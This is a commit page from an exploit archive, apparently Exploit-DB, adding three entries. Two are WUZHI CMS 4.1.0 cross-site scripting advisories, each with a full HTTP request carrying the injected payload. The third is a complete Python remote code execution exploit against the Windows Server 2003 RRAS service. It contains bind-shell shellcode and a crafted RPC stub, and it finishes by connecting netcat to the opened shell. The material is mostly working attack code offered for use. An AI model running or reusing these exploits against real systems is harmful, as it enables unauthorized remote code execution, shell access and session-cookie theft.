DB: 2018-05-14
3 changes to exploits/shellcodes Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting
This commit is contained in:
Offensive Security
parent
7788a305c5
commit
0ca4688023
4 changed files with 134 additions and 0 deletions
16
exploits/php/webapps/44617.txt
Normal file
16
exploits/php/webapps/44617.txt
Normal file
|
|
@ -0,0 +1,16 @@
|
|||
# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability
|
||||
# Date: 2018-4-23
|
||||
# Exploit Author: jiguang (s1@jiguang.in)
|
||||
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
|
||||
# Software Link: https://github.com/wuzhicms/wuzhicms
|
||||
# Version: 4.1.0
|
||||
# CVE: CVE-2018-10313
|
||||
|
||||
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/133)
|
||||
There is a xss vulnerability that can stealing administrator cookie, fishing attack, etc. via the form%5Bqq_10%5D parameter post to the /index.php?m=member&f=index&v=profile&set_iframe=1
|
||||
|
||||
`POST /wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/wuzhi/www/index.php?m=member&f=index&v=profile&set_iframe=1 Content-Type: application/x-www-form-urlencoded Content-Length: 74 Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3; EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D; EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj; EkT_userkeys=e7%2FCIDS8IFYxTUG8kAb7Ww%3D%3D; EkT_truename=yuduo; EkT_auth=lwMUjMOtAXpsQyZViV3zkNdoXMK7Up5NWRRI4Ro4FDKECQHhZ1ntK0WcBotqHVYyx3z9AYABYpAsEx4OdqcExF5S1d7Gw31AvtN07WdqMw28yLCoyNv8RA%3D%3D; EkT__uid=ocqUyYLd7bm05%2Ft4KcS%2B6Q%3D%3D; EkT__username=URDJ1YisL%2BXkt7Mzgg3aNA%3D%3D; EkT__groupid=aZR0cJTYiMBkLfoq8PwJ0g%3D%3D; EkT_modelid=10; tFf_uid=ej6BNn7ulZVYfrHwlgXMvg%3D%3D; tFf_username=YuhCykTKqrPt5fHl2zROVg%3D%3D; tFf_wz_name=IAFonn80xi%2FUvXNXx8uR%2FQ%3D%3D; tFf_siteid=dUi1cO%2FrqMr0atgyt9b%2BNw%3D%3D; tFf_auth=EVUCupGrAYuOzHKFNYqbS%2B39rd2Ynyn74kyNU3KlUwiQCJGQMAgEMU0go7SqkJsUA8kNZq6BsF5nFNbEeL5ehNOQ5DkCGZ4h4JnRqFB8UFIh9kWHsJe84Q%3D%3D; tFf__uid=FM0wd0X5ONWZsKHK8N3j%2Fw%3D%3D; tFf__username=haycqodNzDQbfpqnsWY3xA%3D%3D; tFf__groupid=I7EFExZnf2tvQCMhDV%2B1nA%3D%3D; tFf_truename=yuduo; tFf_modelid=10; SwW_uid=Bk1YojgAB4vSAv%2BmPy3WYg%3D%3D; SwW_username=BTEh6yj6GaEMdyByi0JOZw%3D%3D; SwW_wz_name=8vypKiZ6Ck1JQloRN3gGZQ%3D%3D; SwW_siteid=jm2uH%2FJAmU8uh1X4AlQ1nQ%3D%3D; SwW_qkey=sSAglhFB%2F04GAI1A3H4vDpnfBjktIjQO; SwW_truename=yuyuyu; SwW_auth=qVG8d0BqbIYaHf7emEsG%2Bz%2Fo4LTxYomIRzLjUyu1wWd0BfW4Eucw1UXVm3OTEBexHDGzzwvYarSW62r%2F%2BZrP6RZloFSgyn1%2B5QSsfVv8XDbbIN5Wzd32rQ%3D%3D; SwW__uid=SQgSrskOQqPeThE7vxpQuQ%3D%3D; SwW__username=ZnY2K%2B8IB6WgdsrHTD%2F%2Fzg%3D%3D; SwW__groupid=wVnor3QYe03CC%2B9JInwPIQ%3D%3D; SwW_modelid=10 Connection: close Upgrade-Insecure-Requests: 1
|
||||
|
||||
`form%5Bqq_10%5D`=234234" onmouseover="confirm(22)&submit=%E6%8F%90%E4%BA%A4`
|
||||
|
||||
------------------
|
||||
28
exploits/php/webapps/44618.txt
Normal file
28
exploits/php/webapps/44618.txt
Normal file
|
|
@ -0,0 +1,28 @@
|
|||
# Exploit Title: WUZHI CMS 4.1.0 XSS Vulnerability
|
||||
# Date: 2018-4-23
|
||||
# Exploit Author: jiguang (s1@jiguang.in)
|
||||
# Vendor Homepage: https://github.com/wuzhicms/wuzhicms
|
||||
# Software Link: https://github.com/wuzhicms/wuzhicms
|
||||
# Version: 4.1.0
|
||||
# CVE: CVE-2018-10311
|
||||
|
||||
An issue was discovered in WUZHI CMS 4.1.0 (https://github.com/wuzhicms/wuzhicms/issues/131)
|
||||
There is a xss vulnerability that can stealing administrator cookie, fishing attack, etc. via the tag[pinyin] parameter post to the /index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=?&_submenuid=?
|
||||
|
||||
|
||||
`[POST /www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101 HTTP/1.1
|
||||
Host: localhost
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
|
||||
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://localhost/www/index.php?m=tags&f=index&v=add&&_su=wuzhicms&_menuid=95&_submenuid=101
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
Content-Length: 270
|
||||
Cookie: PHPSESSID=uk4g8bm4l96iv5rl6ej2re83a3; EkT_uid=c%2FzWH2EByNj%2Fm78WencnAg%3D%3D; EkT_username=oR5iColhZ3j6z343ib%2B9Lg%3D%3D; EkT_wz_name=LVeemy520l5DQnc4SQGtsw%3D%3D; EkT_siteid=Wl70z0XOgxO6TVPS70twsg%3D%3D; EkT_qkey=jiPLTZIrWUySV8FmwZwibPjlIPfq0nTj
|
||||
Connection: close
|
||||
Upgrade-Insecure-Requests: 1
|
||||
|
||||
tag%5Btag%5D=jiguang&tag%5Btitle%5D=jiguang&tag%5Bkeyword%5D=jiguang&tag%5Bdesc%5D=jiguang&tag%5Bisshow%5D=1&tag%5Blinkageid%5D=0&LK2_1=0&## tag%5Bpinyin%5D=ji%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E&tag%5Bletter%5D=&tag%5Burl%5D=&submit=%E6%8F%90+%E4%BA%A4](url)`
|
||||
|
||||
------------------
|
||||
87
exploits/windows/remote/44616.py
Executable file
87
exploits/windows/remote/44616.py
Executable file
|
|
@ -0,0 +1,87 @@
|
|||
#!/usr/bin/env python
|
||||
# -*- coding: utf-8 -*-
|
||||
#Tested in Windows Server 2003 SP2 (ES) - Only works when RRAS service is enabled.
|
||||
|
||||
#The exploited vulnerability is an arbitraty pointer deference affecting the dwVarID field of the MIB_OPAQUE_QUERY structure.
|
||||
#dwVarID (sent by the client) is used as a pointer to an array of functions. The application doest not check if the pointer is #pointing out of the bounds of the array so is possible to jump to specific portions of memory achieving remote code execution.
|
||||
#Microsoft has not released a patch for Windows Server 2003 so consider to disable the RRAS service if you are still using
|
||||
#Windows Server 2003.
|
||||
|
||||
#Exploit created by: Víctor Portal
|
||||
#For learning purpose only
|
||||
|
||||
import struct
|
||||
import sys
|
||||
import time
|
||||
import os
|
||||
|
||||
from threading import Thread
|
||||
|
||||
from impacket import smb
|
||||
from impacket import uuid
|
||||
from impacket import dcerpc
|
||||
from impacket.dcerpc.v5 import transport
|
||||
|
||||
target = sys.argv[1]
|
||||
|
||||
print '[-]Initiating connection'
|
||||
trans = transport.DCERPCTransportFactory('ncacn_np:%s[\\pipe\\browser]' % target)
|
||||
trans.connect()
|
||||
|
||||
print '[-]connected to ncacn_np:%s[\\pipe\\browser]' % target
|
||||
dce = trans.DCERPC_class(trans)
|
||||
|
||||
#RRAS DCE-RPC endpoint
|
||||
dce.bind(uuid.uuidtup_to_bin(('8f09f000-b7ed-11ce-bbd2-00001a181cad', '0.0')))
|
||||
|
||||
#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp lport=4444 -b "\x00" -f python
|
||||
buf = ""
|
||||
buf += "\xb8\x3c\xb1\x1e\x1d\xd9\xc8\xd9\x74\x24\xf4\x5a\x33"
|
||||
buf += "\xc9\xb1\x53\x83\xc2\x04\x31\x42\x0e\x03\x7e\xbf\xfc"
|
||||
buf += "\xe8\x82\x57\x82\x13\x7a\xa8\xe3\x9a\x9f\x99\x23\xf8"
|
||||
buf += "\xd4\x8a\x93\x8a\xb8\x26\x5f\xde\x28\xbc\x2d\xf7\x5f"
|
||||
buf += "\x75\x9b\x21\x6e\x86\xb0\x12\xf1\x04\xcb\x46\xd1\x35"
|
||||
buf += "\x04\x9b\x10\x71\x79\x56\x40\x2a\xf5\xc5\x74\x5f\x43"
|
||||
buf += "\xd6\xff\x13\x45\x5e\x1c\xe3\x64\x4f\xb3\x7f\x3f\x4f"
|
||||
buf += "\x32\x53\x4b\xc6\x2c\xb0\x76\x90\xc7\x02\x0c\x23\x01"
|
||||
buf += "\x5b\xed\x88\x6c\x53\x1c\xd0\xa9\x54\xff\xa7\xc3\xa6"
|
||||
buf += "\x82\xbf\x10\xd4\x58\x35\x82\x7e\x2a\xed\x6e\x7e\xff"
|
||||
buf += "\x68\xe5\x8c\xb4\xff\xa1\x90\x4b\xd3\xda\xad\xc0\xd2"
|
||||
buf += "\x0c\x24\x92\xf0\x88\x6c\x40\x98\x89\xc8\x27\xa5\xc9"
|
||||
buf += "\xb2\x98\x03\x82\x5f\xcc\x39\xc9\x37\x21\x70\xf1\xc7"
|
||||
buf += "\x2d\x03\x82\xf5\xf2\xbf\x0c\xb6\x7b\x66\xcb\xb9\x51"
|
||||
buf += "\xde\x43\x44\x5a\x1f\x4a\x83\x0e\x4f\xe4\x22\x2f\x04"
|
||||
buf += "\xf4\xcb\xfa\xb1\xfc\x6a\x55\xa4\x01\xcc\x05\x68\xa9"
|
||||
buf += "\xa5\x4f\x67\x96\xd6\x6f\xad\xbf\x7f\x92\x4e\xae\x23"
|
||||
buf += "\x1b\xa8\xba\xcb\x4d\x62\x52\x2e\xaa\xbb\xc5\x51\x98"
|
||||
buf += "\x93\x61\x19\xca\x24\x8e\x9a\xd8\x02\x18\x11\x0f\x97"
|
||||
buf += "\x39\x26\x1a\xbf\x2e\xb1\xd0\x2e\x1d\x23\xe4\x7a\xf5"
|
||||
buf += "\xc0\x77\xe1\x05\x8e\x6b\xbe\x52\xc7\x5a\xb7\x36\xf5"
|
||||
buf += "\xc5\x61\x24\x04\x93\x4a\xec\xd3\x60\x54\xed\x96\xdd"
|
||||
buf += "\x72\xfd\x6e\xdd\x3e\xa9\x3e\x88\xe8\x07\xf9\x62\x5b"
|
||||
buf += "\xf1\x53\xd8\x35\x95\x22\x12\x86\xe3\x2a\x7f\x70\x0b"
|
||||
buf += "\x9a\xd6\xc5\x34\x13\xbf\xc1\x4d\x49\x5f\x2d\x84\xc9"
|
||||
buf += "\x6f\x64\x84\x78\xf8\x21\x5d\x39\x65\xd2\x88\x7e\x90"
|
||||
buf += "\x51\x38\xff\x67\x49\x49\xfa\x2c\xcd\xa2\x76\x3c\xb8"
|
||||
buf += "\xc4\x25\x3d\xe9"
|
||||
|
||||
#NDR format
|
||||
stub = "\x21\x00\x00\x00" #dwPid = PID_IP (IPv4)
|
||||
stub += "\x10\x27\x00\x00" #dwRoutingPID
|
||||
stub += "\xa4\x86\x01\x00" #dwMibInEntrySize
|
||||
stub += "\x41"*4 #_MIB_OPAQUE_QUERY pointer
|
||||
stub += "\x04\x00\x00\x00" #dwVarID (_MIB_OPAQUE_QUERY)
|
||||
stub += "\x41"*4 #rgdwVarIndex (_MIB_OPAQUE_QUERY)
|
||||
stub += "\xa4\x86\x01\x00" #dwMibOutEntrySize
|
||||
stub += "\xad\x0b\x2d\x06" #dwVarID ECX (CALL off_64389048[ECX*4]) -> p2p JMP EAX #dwVarID (_MIB_OPAQUE_QUERY)
|
||||
stub += "\xd0\xba\x61\x41\x41" + "\x90"*5 + buf + "\x41"*(100000-10-len(buf)) #rgdwVarIndex (_MIB_OPAQUE_QUERY)
|
||||
stub += "\x04\x00\x00\x00" #dwId (_MIB_OPAQUE_INFO)
|
||||
stub += "\x41"*4 #ullAlign (_MIB_OPAQUE_INFO)
|
||||
|
||||
|
||||
dce.call(0x1e, stub) #0x1d MIBEntryGetFirst (other RPC calls are also affected)
|
||||
print "[-]Exploit sent to target successfully..."
|
||||
|
||||
print "Waiting for shell..."
|
||||
time.sleep(5)
|
||||
os.system("nc " + target + " 4444")
|
||||
|
|
@ -16485,6 +16485,7 @@ id,file,description,date,author,type,platform,port
|
|||
44598,exploits/php/remote/44598.rb,"PlaySMS - 'import.php' Authenticated CSV File Upload Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
|
||||
44599,exploits/php/remote/44599.rb,"PlaySMS 1.4 - 'sendfromfile.php?Filename' Authenticated 'Code Execution (Metasploit)",2018-05-08,Metasploit,remote,php,
|
||||
44611,exploits/php/remote/44611.rb,"Mantis 1.1.3 - 'manage_proj_page' PHP Code Execution (Metasploit)",2018-05-10,Metasploit,remote,php,80
|
||||
44616,exploits/windows/remote/44616.py,"Microsoft Windows 2003 SP2 - 'RRAS' SMB Remote Code Execution",2018-05-13,vportal,remote,windows,
|
||||
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
|
||||
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
|
||||
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
|
||||
|
|
@ -39302,3 +39303,5 @@ id,file,description,date,author,type,platform,port
|
|||
44607,exploits/java/webapps/44607.txt,"ModbusPal 1.6b - XML External Entity Injection",2018-05-10,"Trent Gordon",webapps,java,
|
||||
44608,exploits/php/webapps/44608.txt,"MyBB Latest Posts on Profile Plugin 1.1 - Cross-Site Scripting",2018-05-10,0xB9,webapps,php,
|
||||
44613,exploits/windows/webapps/44613.txt,"Open-AudIT Community - 2.2.0 – Cross-Site Scripting",2018-05-11,"Tejesh Kolisetty",webapps,windows,
|
||||
44617,exploits/php/webapps/44617.txt,"WUZHI CMS 4.1.0 - 'form[qq_10]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
|
||||
44618,exploits/php/webapps/44618.txt,"WUZHI CMS 4.1.0 - 'tag[pinyin]' Cross-Site Scripting",2018-05-13,jiguang,webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue